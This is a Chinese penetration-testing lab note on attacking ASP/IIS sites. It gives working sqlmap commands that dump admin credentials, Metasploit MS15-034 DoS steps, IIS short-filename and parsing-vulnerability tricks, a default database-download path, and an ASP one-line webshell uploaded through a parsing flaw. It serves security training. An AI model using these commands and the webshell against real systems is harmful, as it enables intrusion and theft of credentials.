041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏
#知识点:
1、ASP-SQL注入-Access数据库
2、ASP-默认安装-数据库泄漏下载
3、ASP-IIS-CVE&短文件&解析&写入
演示案例:
➢ASP-默认安装-MDB数据库泄漏下载
➢ASP-中间件-CVE&短文件&解析&写权限
➢ASP-SQL注入-SQLMAP使用&ACCESS注入
#ASP-默认安装-MDB数据库泄漏下载
- 由于大部分ASP程序与ACCESS数据库搭建,但ACCESS无需连接
- 在==脚本文件中定义配置好数据库路径即用,不需要额外配置安装数据库==
- 提前固定好的数据库路径如默认未修改,
- 当攻击者知道数据库的完整路径,可远程下载后解密数据实现攻击。
1,打开虚拟机环境2003 企业版 32位 IIS 6.0 CN
2,右键我的电脑打开管理,选择Internet信息服务(IIS)→网站
3,选择对应的fyblogs_3.0 网站,查看分配的ip地址
4,通过其他主机访问该IP地址
5,成功访问后,通过访问对应下载路径,直接下载`#data.mdb文件
http://192.168.200.140:81**/database/%23data.mdb**
6,打开文件,发现其中==泄露用户名密码==等信息
遇到问题:打开网址不能在正常打开
解决:将属性中的ip地址重新分配即可
#ASP-中间件-CVE&短文件&解析&写权限
HTTP.SYS(CVE-2015-1635)
1、漏洞描述
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
2、影响版本
Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2
3、漏洞利用条件
安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本
4、漏洞复现
-
msfconsole是==Metasploit Framework的命令行界面==,它是一个功能强大的渗透测试工具和漏洞利用框架。Metasploit Framework旨在帮助安全专业人员评估和测试计算机系统的安全性,包括发现漏洞、开发和执行攻击、获取远程访问权限等。
-
use auxiliary/dos/http/ms15_034_ulonglongadd是Metasploit Framework中的一个辅助模块,用于执行针对MS15-034漏洞(也称为HTTP.sys远程代码执行漏洞)的拒绝服务(DoS)攻击。这个漏洞影响Windows操作系统中的HTTP堆栈,攻击者可以通过发送特制的HTTP请求导致**目标系统崩溃,从而实现拒绝服务攻击。**
-
set rhosts xx.xx.xx.xx
set rport xx
run
IIS短文件
1、漏洞描述
此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
2、漏洞成因:
为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3短文件名。在Windows下查看对应的短文件名,可以使用命令**dir /x**
3、应用场景:
后台路径获取,数据库文件获取,其他敏感文件获取等
python iis_shortname_scan.py [http://192.168.200.140:88/](http://192.168.200.140:88/)
- 选择对应的powereasy 网站,查看分配的ip地址
- 借助工具,输入执行语句和目标ip执行扫描
- 获取到对应的网站目录
4、利用工具:
https://github.com/lijiejie/IIS_shortname_Scanner
IIS文件解析
-
IIS 6 解析漏洞→可以上传木马文件,以图片形式或文件夹形式替换格式
-
1、该版本默认会将***.asp;.jpg** 此种格式的文件名,当成Asp解析
-
2、该版本默认会将***.asp/目录下的所有文件当成Asp解析**。
如:logo.asp;.jpg xx.asp/logo.jpg
-
-
IIS 7.x 解析漏洞
- 在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
应用场景:配合文件上传获取Webshell
- 在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
IIS写权限
- IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许
- 可以通过提交put包,进行写入文件(可置入木马,获得权限)
参考利用:https://cloud.tencent.com/developer/article/2050105
#ASP-SQL注入-SQLMAP使用&ACCESS注入
- ACCESS数据库无管理帐号密码,顶级架构为表名,列名(字段),数据,
- 所以在注入猜解中一般采用字典猜解表和列再获取数据,猜解简单但又可能出现猜解不到的情况
- Access数据库在当前安全发展中已很少存在,故直接使用SQLMAP注入,后续再说其他。
1.打开对应的UploadParsing网址,并使用其分配的IP进行访问
2.源码中,没有进行sql语句的过滤,直接拼接,造成有注入风险
-
http://192.168.200.140:89**/Pic.asp?classid=3**
3.使用sqlmap工具进行sql注入
-
G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐狸\gui_scan\sqlmap
-
python sqlmap.py -u “” --tables //获取表名
python sqlmap.py -u “” --cloumns -T admin //获取admin表名下的列名
python sqlmap.py -u “” --dump -C “username,password” -T admin //获取表名下的列名数据 -
python .\sqlmap.py -u “http://192.168.200.140:89/Pic.asp?classid=3” --tables
-
python .\\sqlmap.py: 启动 SQLMap 工具,使用 Python 解释器运行。 -
u "<http://192.168.200.140:89/Pic.asp?classid=3>": 指定目标 URL,即要测试的网站地址。在这个例子中,目标 URL 是http://192.168.200.140:89/Pic.asp?classid=3。u选项用于指定 URL。 -
-tables: 指定 SQLMap 工具执行的任务,这里是获取数据库中的所有表。-tables选项用于请求表的信息。 -
提示有注入点
-
-
它询问是否要使用常见的表存在性检查方法
-
do you want to use common table existence check? [Y/n/q] y
-
选择要使用的常见表文件的提示。用户可以选择默认的常见表文件,也可以选择自定义的常见表文件。
-
询问用户要设置多少个线程进行测试
-
please enter number of threads? [Enter for 1 (current)] 输入10
-
-
python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --columns -T admin
-
-columns: 这是 SQLMap 的一个选项,用于指示工具查找指定表的列。 -
T admin: 这是 SQLMap 的另一个选项,用于指定目标表的名称。在这里,它是 “admin” 表。
-
-
python .[sqlmap.py](http://sqlmap.py/) -u “http://192.168.200.140:89/Pic.asp?classid=3” --dump -C “username,password” -T admin
-
-dump: 这是 SQLMap 的选项,用于指示工具从数据库中检索数据。 -
C "username,password": 这是 SQLMap 的选项,用于指定要检索的列的名称。在这里,它是 “username” 和 “password” 列。 -
得出如下的用户名和密码
-
-
由于密码是MD5加密的
使用解密解密出密码
4.使用IIS短目录或**目录扫描(7kbscan御剑版)**扫描找到后台登录页面
-
python iis_shortname_scan.py http://192.168.200.140:89/
-
扫描出一些目录
-
一一进行访问在访问时发现:http://192.168.200.140:89/upfile.asp
-
会跳转到后台登录页面:http://192.168.200.140:89**/Tcnet/Admin_Login.asp**
-
-
目录扫描(7kbscan御剑版)
-
直接将目标地址写入
-
选择对应的字典类型和显示结果
-
发现有跳转的页面直接访问至后台
-
-
网站爬虫
- 直接在网址检测中点击文件,查看目录和文件结构
- 直接查看网站前端源码
5.登录后台页面
6.模拟漏洞上传测试(只需要了解后面还会讲)
-
分别开启burp和浏览器的代理和端口
-
上传普通的小的照片
-
进行抓包,将包中的有关文件路径的内容,拼接上去**/1.asp;.(可以将木马文件,替换为该格式)**
-
再次抓包
-
将照片路径替换为:192.168.126.131:89**/1.asp;.20235192154599715.png**
-
发现可以被当成Asp正常解析
-
在抓包的后面加上木马程序的内容
**<%eval request(”passs”)%>**-
<%和%>: 这是ASP脚本中的定界符,用于标识服务器端代码的开始和结束。 -
eval: 这是一个函数或操作符,用于执行动态生成的代码。在这里,它被用于执行后面括号中的内容。 -
request("passs"): 这部分看起来是从请求中获取名为 “passs” 的参数的值。request是用于获取请求参数的对象,而 “passs” 是参数的名称。
总体来说,这段代码的作用是从请求中获取名为 “passs” 的参数的值,并使用
eval函数执行它。这种构造可能导致安全风险,特别是如果用户能够控制传递给 “passs” 参数的内容。eval的使用通常被认为是不安全的,因为它允许执行任意的动态代码,可能导致代码注入攻击。 -
-
使用哥斯拉,利用木马文件获得权限成功
文章来源:https://www.toymoban.com/news/detail-850054.html
文章来源地址https://www.toymoban.com/news/detail-850054.html
-
到了这里,关于041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![【已解决】无法在web.xml或使用此应用程序部署的jar文件中解析绝对uri:[http://java.sun.com/jsp/jstl/core]](https://imgs.yssmx.com/Uploads/2024/02/732711-1.png)
